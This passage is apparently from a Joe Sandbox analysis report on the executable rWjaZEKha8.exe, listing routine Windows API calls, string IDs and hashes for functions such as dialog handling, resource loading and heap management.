                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: CompareString_wcschr
                  • String ID: <$HIDE$MAX$MIN
                  • API String ID: 2548945186-3358265660
                  • Opcode ID: 6df54f42bd6c9f21503a7a5db059bf8e6cb49cc8976f71fb428460569b7150d8
                  • Instruction ID: 1211f5fb239f3a8e266aba66afc07625c2a231b724f9b346351eb9004818a1b2
                  • Opcode Fuzzy Hash: 6df54f42bd6c9f21503a7a5db059bf8e6cb49cc8976f71fb428460569b7150d8
                  • Instruction Fuzzy Hash: 5D316176904609AEDF25EA94CC91FEA77BDEB64314F004066FA05D6050EBB19FC48FA0
                  Function 0018ADED Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59windowCOMMON
                  Download Yara Rule
                  APIs
                  • LoadBitmapW.USER32(00000065), ref: 0018ADFD
                  • GetObjectW.GDI32(00000000,00000018,?), ref: 0018AE22
                  • DeleteObject.GDI32(00000000), ref: 0018AE54
                  • DeleteObject.GDI32(00000000), ref: 0018AE77
                    • Part of subcall function 00189E1C: FindResourceW.KERNEL32(0018AE4D,PNG,?,?,?,0018AE4D,00000066), ref: 00189E2E
                    • Part of subcall function 00189E1C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,0018AE4D,00000066), ref: 00189E46
                    • Part of subcall function 00189E1C: LoadResource.KERNEL32(00000000,?,?,?,0018AE4D,00000066), ref: 00189E59
                    • Part of subcall function 00189E1C: LockResource.KERNEL32(00000000,?,?,?,0018AE4D,00000066), ref: 00189E64
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
                  • String ID: ]
                  • API String ID: 142272564-3352871620
                  • Opcode ID: 8b32c48bb36965584f8f9d58d77975e86f6f06d51c01c991ed7dea82524c0443
                  • Instruction ID: 808699678bbada906e4f02b8a41db91474836a586ebfb1d4fd34689ee22a155a
                  • Opcode Fuzzy Hash: 8b32c48bb36965584f8f9d58d77975e86f6f06d51c01c991ed7dea82524c0443
                  • Instruction Fuzzy Hash: F4014532542615A7D71077A49C05BBFBB7AAF91B42F0C0112FE10A7291DF318E119FB2
                  Function 0018CC90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0017130B: GetDlgItem.USER32(00000000,00003021), ref: 0017134F
                    • Part of subcall function 0017130B: SetWindowTextW.USER32(00000000,001A35B4), ref: 00171365
                  • EndDialog.USER32(?,00000001), ref: 0018CCDB
                  • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0018CCF1
                  • SetDlgItemTextW.USER32(?,00000066,?), ref: 0018CD05
                  • SetDlgItemTextW.USER32(?,00000068), ref: 0018CD14
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: ItemText$DialogWindow
                  • String ID: RENAMEDLG
                  • API String ID: 445417207-3299779563
                  • Opcode ID: 6f7b07c4e6be16f5dcc223d85c5d255f11c756f0df1889ac3618bde8393fe2ec
                  • Instruction ID: a0ebecaed1032823f2c60d6a0a9a279e85c67f25890fe73a922a988d81901ae1
                  • Opcode Fuzzy Hash: 6f7b07c4e6be16f5dcc223d85c5d255f11c756f0df1889ac3618bde8393fe2ec
                  • Instruction Fuzzy Hash: 3F0128322862107FD1116F649C09F577BACEBAAB02F104412F345A24E0C7B19A458FF5
                  Function 001975C2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00197573,00000000,?,00197513,00000000,001ABAD8,0000000C,0019766A,00000000,00000002), ref: 001975E2
                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 001975F5
                  • FreeLibrary.KERNEL32(00000000,?,?,?,00197573,00000000,?,00197513,00000000,001ABAD8,0000000C,0019766A,00000000,00000002), ref: 00197618
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AddressFreeHandleLibraryModuleProc
                  • String ID: CorExitProcess$mscoree.dll
                  • API String ID: 4061214504-1276376045
                  • Opcode ID: 1fb880c14ad32eb8f1fd20a9ac0d0be949c59f1ce3d75bce902e95d2dcbc3f7b
                  • Instruction ID: 75f62e44d1b614462c046bc37b6298b2dc8f004c83fcd800cf488c279518664e
                  • Opcode Fuzzy Hash: 1fb880c14ad32eb8f1fd20a9ac0d0be949c59f1ce3d75bce902e95d2dcbc3f7b
                  • Instruction Fuzzy Hash: 0DF06231A1861CBFDB169FA5DC09B9EBFB9EF05715F044069F805A2590DF308E80CB94
                  Function 0017EB73 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00180085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 001800A0
                    • Part of subcall function 00180085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0017EB86,Crypt32.dll,00000000,0017EC0A,?,?,0017EBEC,?,?,?), ref: 001800C2
                  • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0017EB92
                  • GetProcAddress.KERNEL32(001B81C0,CryptUnprotectMemory), ref: 0017EBA2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AddressProc$DirectoryLibraryLoadSystem
                  • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                  • API String ID: 2141747552-1753850145
                  • Opcode ID: 2f19e2096c427d6309194cec12512dee14ae239e897dc57b7ebe6431dfd8b037
                  • Instruction ID: 2851a5f1bb7a0af12b3ba064167bff4824abcce3ce441d2f1fd415b97e10b79a
                  • Opcode Fuzzy Hash: 2f19e2096c427d6309194cec12512dee14ae239e897dc57b7ebe6431dfd8b037
                  • Instruction Fuzzy Hash: 25E04F754007419ECB219F349809B42BEE45B1A705B00C85DF4E6D3550D7B4D6848B50
                  Function 00197DD9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: _free
                  • String ID:
                  • API String ID: 269201875-0
                  • Opcode ID: b86e791d58c9db6b875fd8833b55426521efe3a14a5ee91410ca98eb0fd578f8
                  • Instruction ID: add8fe13737d1cc54eeccb3f51e0884a8da895fbfb5a1b6e9d4a52d77eb8e186
                  • Opcode Fuzzy Hash: b86e791d58c9db6b875fd8833b55426521efe3a14a5ee91410ca98eb0fd578f8
                  • Instruction Fuzzy Hash: B541B136A103049FDF24DF78C881A6EB7E5EF99714F1545A9E515EB281EB31EE01CB80
                  Function 0019B610 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                  Download Yara Rule
                  APIs
                  • GetEnvironmentStringsW.KERNEL32 ref: 0019B619
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0019B63C
                    • Part of subcall function 00198518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0019C13D,00000000,?,001967E2,?,00000008,?,001989AD,?,?,?), ref: 0019854A
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0019B662
                  • _free.LIBCMT ref: 0019B675
                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0019B684
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                  • String ID:
                  • API String ID: 336800556-0
                  • Opcode ID: 1b74bcc841a85e5e681ca3093db43b65da30f9e84faa229342ec138234e97cdb
                  • Instruction ID: 9a3b4240da35aca0e5bc0ecbb9163460102170913b0cedc259d0ec9d768a146a
                  • Opcode Fuzzy Hash: 1b74bcc841a85e5e681ca3093db43b65da30f9e84faa229342ec138234e97cdb
                  • Instruction Fuzzy Hash: FA018FB2606315BF6B211ABA7DCCD7B6A6DEFC7BA03160229B914C3110EF60ED0191B0
                  Function 00199029 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • GetLastError.KERNEL32(?,?,?,0019895F,001985FB,?,00198FD3,00000001,00000364,?,00193713,00000050,?,001B0EE8,00000200), ref: 0019902E
                  • _free.LIBCMT ref: 00199063
                  • _free.LIBCMT ref: 0019908A
                  • SetLastError.KERNEL32(00000000,?,001B0EE8,00000200), ref: 00199097
                  • SetLastError.KERNEL32(00000000,?,001B0EE8,00000200), ref: 001990A0
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: ErrorLast$_free
                  • String ID:
                  • API String ID: 3170660625-0
                  • Opcode ID: 3f374c2e33bba4dc79f8391a8351d2078440fccbc237631836feea60700616f5
                  • Instruction ID: c2bf01e9df1b8edeef0de957868e2d14d3bbf0a327dc61dd8c67f2fa0be93eec
                  • Opcode Fuzzy Hash: 3f374c2e33bba4dc79f8391a8351d2078440fccbc237631836feea60700616f5
                  • Instruction Fuzzy Hash: B5012D36505B006BDF31277D6D85A2B2A6D9FE33B173A012DF53993151EF60CC054160
                  Function 0018075B Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00180A41: ResetEvent.KERNEL32(?), ref: 00180A53
                    • Part of subcall function 00180A41: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00180A67
                  • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 0018078F
                  • CloseHandle.KERNEL32(?,?), ref: 001807A9
                  • DeleteCriticalSection.KERNEL32(?), ref: 001807C2
                  • CloseHandle.KERNEL32(?), ref: 001807CE
                  • CloseHandle.KERNEL32(?), ref: 001807DA
                    • Part of subcall function 0018084E: WaitForSingleObject.KERNEL32(?,000000FF,00180A78,?), ref: 00180854
                    • Part of subcall function 0018084E: GetLastError.KERNEL32(?), ref: 00180860
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                  • String ID:
                  • API String ID: 1868215902-0
                  • Opcode ID: de4b233f901b2979e3bde0f5b03b10fd68a41d9c6bc7fe4977b23398cbe0d0c8
                  • Instruction ID: 77c78bdc6c1d01737a9a4d702bb505080048927a558c5a12cb33c05d4786edae
                  • Opcode Fuzzy Hash: de4b233f901b2979e3bde0f5b03b10fd68a41d9c6bc7fe4977b23398cbe0d0c8
                  • Instruction Fuzzy Hash: 4B017572540B48EFC722AB65DD85FC6FBE9FB4A710F000519F16A42560CB756A88CFA0
                  Function 0019BF10 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • _free.LIBCMT ref: 0019BF28
                    • Part of subcall function 001984DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0019BFA7,?,00000000,?,00000000,?,0019BFCE,?,00000007,?,?,0019C3CB,?), ref: 001984F4
                    • Part of subcall function 001984DE: GetLastError.KERNEL32(?,?,0019BFA7,?,00000000,?,00000000,?,0019BFCE,?,00000007,?,?,0019C3CB,?,?), ref: 00198506
                  • _free.LIBCMT ref: 0019BF3A
                  • _free.LIBCMT ref: 0019BF4C
                  • _free.LIBCMT ref: 0019BF5E
                  • _free.LIBCMT ref: 0019BF70
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast
                  • String ID:
                  • API String ID: 776569668-0
                  • Opcode ID: 40489cbbfbe310660aa87f87047e67da0c0f880a385ccce914d35514b93acba0
                  • Instruction ID: 7164cb5234fe7d0afac3cd55a547dbee91fc28eda9c577fe48f8bc1030b1cf29
                  • Opcode Fuzzy Hash: 40489cbbfbe310660aa87f87047e67da0c0f880a385ccce914d35514b93acba0
                  • Instruction Fuzzy Hash: 8EF01D32508605AB8E20EFA8FFC6D1A77E9BF127107654819F008D7D10CB34FC808A64
                  Function 00198060 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                  Download Yara Rule
                  APIs
                  • _free.LIBCMT ref: 0019807E
                    • Part of subcall function 001984DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0019BFA7,?,00000000,?,00000000,?,0019BFCE,?,00000007,?,?,0019C3CB,?), ref: 001984F4
                    • Part of subcall function 001984DE: GetLastError.KERNEL32(?,?,0019BFA7,?,00000000,?,00000000,?,0019BFCE,?,00000007,?,?,0019C3CB,?,?), ref: 00198506
                  • _free.LIBCMT ref: 00198090
                  • _free.LIBCMT ref: 001980A3
                  • _free.LIBCMT ref: 001980B4
                  • _free.LIBCMT ref: 001980C5
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast
                  • String ID:
                  • API String ID: 776569668-0
                  • Opcode ID: 3aff45ae47539ddbe8db8ee904324d2c4e784651e24b1b5e99c825b41ffe8a94
                  • Instruction ID: 1b1b4cebd90a5a14cd7fe6397d913085e18c5df3051fdfa36e7349604e27fce1
                  • Opcode Fuzzy Hash: 3aff45ae47539ddbe8db8ee904324d2c4e784651e24b1b5e99c825b41ffe8a94
                  • Instruction Fuzzy Hash: 13F05E74903125BBCB116F19BC114453BA5FB2672031E461BF80097E71CF3698D19FC2
                  Function 001976BD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                  Download Yara Rule
                  APIs
                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\rWjaZEKha8.exe,00000104), ref: 001976FD
                  • _free.LIBCMT ref: 001977C8
                  • _free.LIBCMT ref: 001977D2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: _free$FileModuleName
                  • String ID: C:\Users\user\Desktop\rWjaZEKha8.exe
                  • API String ID: 2506810119-1105223825
                  • Opcode ID: d747b4423d87bbe7404a6788d927f1bdd974726d018a3f664fc0633e5ed02040
                  • Instruction ID: 87f696bb2c5f7f16c0525a424a9608ae21d49b5ffbe041ed9dc66057f6f41d8b
                  • Opcode Fuzzy Hash: d747b4423d87bbe7404a6788d927f1bdd974726d018a3f664fc0633e5ed02040
                  • Instruction Fuzzy Hash: AF319D71A19208BFDF25DFD9DC859AEBBECEF95310B144067E80497251D7709E80CBA0
                  Function 00177574 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93COMMON
                  Download Yara Rule
                  APIs
                  • __EH_prolog.LIBCMT ref: 00177579
                    • Part of subcall function 00173B3D: __EH_prolog.LIBCMT ref: 00173B42
                  • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00177640
                    • Part of subcall function 00177BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00177C04
                    • Part of subcall function 00177BF5: GetLastError.KERNEL32 ref: 00177C4A
                    • Part of subcall function 00177BF5: CloseHandle.KERNEL32(?), ref: 00177C59
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                  • String ID: SeRestorePrivilege$SeSecurityPrivilege
                  • API String ID: 3813983858-639343689
                  • Opcode ID: 60315af68a015699cb1210df562c37ef617f1846bc396e2e5dad0109fda5bf1e
                  • Instruction ID: f1653ce73aadbb1a3767c29fb04397cfca7201d603371b3202019ebc82d61567
                  • Opcode Fuzzy Hash: 60315af68a015699cb1210df562c37ef617f1846bc396e2e5dad0109fda5bf1e
                  • Instruction Fuzzy Hash: 6D31EA71A04248AEEF11EB68DC41FFEBB79AF29354F008059F44CE7192D7708A44CBA1
                  Function 0018A430 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0017130B: GetDlgItem.USER32(00000000,00003021), ref: 0017134F
                    • Part of subcall function 0017130B: SetWindowTextW.USER32(00000000,001A35B4), ref: 00171365
                  • EndDialog.USER32(?,00000001), ref: 0018A4B8
                  • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0018A4CD
                  • SetDlgItemTextW.USER32(?,00000066,?), ref: 0018A4E2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: ItemText$DialogWindow
                  • String ID: ASKNEXTVOL
                  • API String ID: 445417207-3402441367
                  • Opcode ID: 0ab4b9c131ba022bfd567751b9727df77afe9488a8f1c6889764e36b77765924
                  • Instruction ID: 5a3158f14da83e4bf1d95aa5d10919e24ebf595a2f9572f80000d7e351deef6d
                  • Opcode Fuzzy Hash: 0ab4b9c131ba022bfd567751b9727df77afe9488a8f1c6889764e36b77765924
                  • Instruction Fuzzy Hash: A611B9322462007FEA21AFA8DC4DF6A3769EF5A700F584047F345974A1C7A15A51DB62
                  Function 0017D1C3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: __fprintf_l_strncpy
                  • String ID: $%s$@%s
                  • API String ID: 1857242416-834177443
                  • Opcode ID: d76bc38bfb126cb4b8acfb26ce4b34145b215cea07ff734e07bf971f5dbd09fa
                  • Instruction ID: 77c4c25bbeae458703faf794a5bdb37a5002c27a0103eaffe1adace249ecf24c
